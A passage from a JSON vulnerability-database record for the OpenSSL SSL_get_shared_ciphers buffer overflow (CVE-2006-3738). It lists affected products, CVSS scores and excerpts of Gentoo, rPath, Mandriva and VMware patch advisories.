          {
            "model": "tru64 b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.657"
          },
          {
            "model": "secure enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "call manager es24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44910"
          },
          {
            "model": "s8300 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear u2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "secure",
            "version": "3.1.4"
          },
          {
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154542.3(5)"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.01"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "project openssl beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.5"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.3.2"
          },
          {
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "s8700 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear sg580",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons 15454e optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1-1"
          },
          {
            "model": "application control engine module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44920"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "model": "project openssl l",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.2"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "ons mstp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "networks wlan access point",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7250.0"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(2)"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:openssl:openssl",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:oracle:e-business_suite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:oracle:http_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_appliance_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_desktop",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_fuji",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_multimedia",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_personal",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_wizpy",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_home",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:trendmicro:interscan_web_security_suite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hp:hp-ux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:linux_advanced_workstation",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Tavis Ormandy taviso@gentoo.org Will Drewry wad@google.com",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2006-3738",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2006-3738",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2006-3738",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#386964",
                "trust": 0.8,
                "value": "0.32"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#845620",
                "trust": 0.8,
                "value": "7.56"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#547300",
                "trust": 0.8,
                "value": "2.53"
              },
              {
                "author": "NVD",
                "id": "CVE-2006-3738",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200609-536",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. OpenSSL Library utility functions 1 First, output a list of encryption algorithms used for communication as a readable character string. SSL_get_shared_ciphers() there is. SSL_get_shared_ciphers() There is a buffer overflow vulnerability in the processing of.OpenSSL Any code may be executed with the privileges of the application that uses it. \nSuccessfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. \n\nBackground\n==========\n\nOpenSSL is an implementation of the Secure Socket Layer and Transport\nLayer Security protocols. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package           /   Vulnerable   /                   Unaffected\n    -------------------------------------------------------------------\n  1  dev-libs/openssl      \u003c 0.9.8e-r3                    \u003e= 0.9.8e-r3\n\nDescription\n===========\n\nMoritz Jodeit reported an off-by-one error in the\nSSL_get_shared_ciphers() function, resulting from an incomplete fix of\nCVE-2006-3738. A flaw has also been reported in the\nBN_from_montgomery() function in crypto/bn/bn_mont.c when performing\nMontgomery multiplication. A local attacker could\nperform a side channel attack to retrieve the RSA private keys. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.8e-r3\"\n\nReferences\n==========\n\n  [ 1 ] CVE-2006-3738\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n  [ 2 ] CVE-2007-3108\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3108\n  [ 3 ] CVE-2007-5135\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-200710-06.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2007 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. rPath Security Advisory: 2006-0175-2\nPublished: 2006-09-28\nUpdated:\n    2006-09-29 Resolved issue in patch for CVE-2006-2940\nProducts: rPath Linux 1\nRating: Major\nExposure Level Classification:\n    Remote Deterministic Unauthorized Access\nUpdated Versions:\n    openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1\n    openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1\n\nReferences:\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n    http://issues.rpath.com/browse/RPL-613\n\nDescription:\n    Previous versions of the openssl package are vulnerable to multiple\n    attacks. \n    In particular, any connection that the mysql daemon will accept\n    may be vulnerable.  In the default configuration of mysql, that\n    would be a local unauthorized access vulnerability, but mysql can\n    be configured to listen for network connections from remote hosts,\n    which would then enable remote unauthorized access.  Any program\n    that calls the SSL_get_shared_ciphers() function may be vulnerable. \n    \n    29 September 2006 Update: The initial fix for this vulnerability was\n    incomplete, and the fault in the fix could enable a Denial of Service\n    attack in some cases of the attack described in CVE-2006-2940. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \n\n Update:\n\n There was an error in the original published patches for CVE-2006-2940. \n New packages have corrected this issue. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2006.0:\n 5e48a8d9a6a03a045b6d0d2b6903dc5b  2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm\n f86f3a2efd19ff5fb1600212cbd8e463  2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 73b99c1a8a34fe3c2279c09c4f385804  2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 526fcd69e1a1768c82afd573dc16982f  2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm \n 441a806fc8a50f74f5b4bcfce1fc8f66  2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm\n\n Mandriva Linux 2006.0/X86_64:\n 54ed69fc4976d3c0953eeebd3c10471a  2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm\n 632fbe5eaff684ec2f27da4bbe93c4f6  2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm\n 04dbe52bda3051101db73fabe687bd7e  2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm\n 5e48a8d9a6a03a045b6d0d2b6903dc5b  2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm\n f86f3a2efd19ff5fb1600212cbd8e463  2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 73b99c1a8a34fe3c2279c09c4f385804  2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm\n ca169246cc85db55839b265b90e8c842  2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm \n 441a806fc8a50f74f5b4bcfce1fc8f66  2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm\n\n Mandriva Linux 2007.0:\n db68f8f239604fb76a0a10c70104ef61  2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm\n 26a4de823aee08e40d28ed7e6ff5b2ff  2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n ab949cf85296ceae864f83fbbac2b55a  2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n a97c6033a33fabcd5509568304b7a988  2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm \n 78964615b7bd71028671257640be3bc5  2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n 1895971ef1221056075c4ee3d4aaac72  2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm\n cfd59201e5e9c436f42b969b4aa567f1  2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm\n 36da85c76eddf95feeb3f4b792528483  2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm\n db68f8f239604fb76a0a10c70104ef61  2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm\n 26a4de823aee08e40d28ed7e6ff5b2ff  2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n ab949cf85296ceae864f83fbbac2b55a  2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n e3aebeae455a0820c5f28483bd6d3fa5  2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm \n 78964615b7bd71028671257640be3bc5  2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm\n\n Corporate 3.0:\n 7f60837e42b45ce50f365ec1372d6aeb  corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm\n 1e7834f6f0fe000f8f00ff49ee6f7ea0  corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.C30mdk.i586.rpm\n 6c86220445ef34c2dadadc3e00701885  corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.i586.rpm\n c25c4042a91b6e7bf9aae1aa2fea32a5  corporate/3.0/i586/openssl-0.9.7c-3.7.C30mdk.i586.rpm \n 2c47b1604aa89033799b1ead4bcebe01  corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 52dfd4d10e00c9bd0944e4486190de93  corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.7.C30mdk.x86_64.rpm\n 258a19afc44dadfaa00d0ebd8b3c0df4  corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.7.C30mdk.x86_64.rpm\n cd5cc151e476552be549c6a37b8a71ea  corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.x86_64.rpm\n 7f60837e42b45ce50f365ec1372d6aeb  corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm\n 492fcc0df9172557a3297d0082321d4d  corporate/3.0/x86_64/openssl-0.9.7c-3.7.C30mdk.x86_64.rpm \n 2c47b1604aa89033799b1ead4bcebe01  corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm\n\n Corporate 4.0:\n 76b3078e53be2ddc019bee74ccb1f39e  corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm\n 0aa4ca3b0d2925255650fb90132d7aad  corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 86dc91f1701293f3319a833746bbe421  corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n daa6c3473f59405778dedd02de73fcc9  corporate/4.0/i586/openssl-0.9.7g-2.5.20060mlcs4.i586.rpm \n a8d2a946d266a94c6d46537ad78b18fa  corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n b5ae71aacd5b99be9e9327d58da29230  corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n 89296e03778a198940c1c413e44b9f45  corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n cb17a0d801c1181ab380472b8ffb085e  corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n 76b3078e53be2ddc019bee74ccb1f39e  corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm\n 0aa4ca3b0d2925255650fb90132d7aad  corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 86dc91f1701293f3319a833746bbe421  corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 8d9a55afdc6d930916bac00fd4c4739b  corporate/4.0/x86_64/openssl-0.9.7g-2.5.20060mlcs4.x86_64.rpm \n a8d2a946d266a94c6d46537ad78b18fa  corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n cd7ad7e95ce17995dfa8129ebe517049  mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.7.M20mdk.i586.rpm\n 11771240baebdc6687af70a8a0f2ffd2  mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.M20mdk.i586.rpm\n 8f672bc81b9528598a8560d876612bfa  mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.M20mdk.i586.rpm\n 214f857a36e5c3e600671b7291cd08ae  mnf/2.0/i586/openssl-0.9.7c-3.7.M20mdk.i586.rpm \n bbb299fd643ccbfbdc1a48b12c7005ce  mnf/2.0/SRPMS/openssl-0.9.7c-3.7.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\n\niD8DBQFFIU7bmqjQ0CJFipgRAuYAAKCZlwMqJzrVCpKYdEqs+UiyM6WrSQCfeIv3\nmAaLoEPfjUca1TR98vgpZUU=\n=Ff9O\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n- -------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2007-0001\nSynopsis:          VMware ESX server security updates\nIssue date:        2007-01-08\nUpdated on:        2007-01-08\nCVE:               CVE-2006-3589 CVE-2006-2937 CVE-2006-2940\n                   CVE-2006-3738 CVE-2006-4339 CVE-2006-4343\n                   CVE-2006-4980\n- -------------------------------------------------------------------\n\n1. Summary:\n\nUpdated ESX Patches address several security issues. \n\n2. Relevant releases:\n\nVMware ESX 3.0.1 without patch ESX-9986131\nVMware ESX 3.0.0 without patch ESX-3069097\n\nVMware ESX 2.5.4 prior to upgrade patch 3\nVMware ESX 2.5.3 prior to upgrade patch 6\nVMware ESX 2.1.3 prior to upgrade patch 4\nVMware ESX 2.0.2 prior to upgrade patch 4\n\n3. Problem description:\n\nProblems addressed by these patches:\n\na. Incorrect permissions on SSL key files generated  by vmware-config\n(CVE-2006-3589):\n\n    ESX 3.0.1: does not have this problem\n    ESX 3.0.0: does not have this problem\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    A possible security issue with the configuration program\n    vmware-config which could set incorrect permissions on SSL key\n    files. Local users may be able to obtain access to the SSL key\n    files. The Common Vulnerabilities and Exposures project\n    (cve.mitre.org) assigned the name CVE-2006-3589 to this issue. \n\nb. OpenSSL library vulnerabilities:\n\n    ESX 3.0.1: corrected by ESX 3.0.1 Patch ESX-9986131\n    ESX 3.0.0: corrected by ESX 3.0.0 Patch ESX-3069097\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    (CVE-2006-2937) OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d\n    allows remote attackers to cause a denial of service (infinite\n    loop and memory consumption) via malformed ASN.1 structures that\n    trigger an improperly handled error condition. \n\n    (CVE-2006-2940) OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 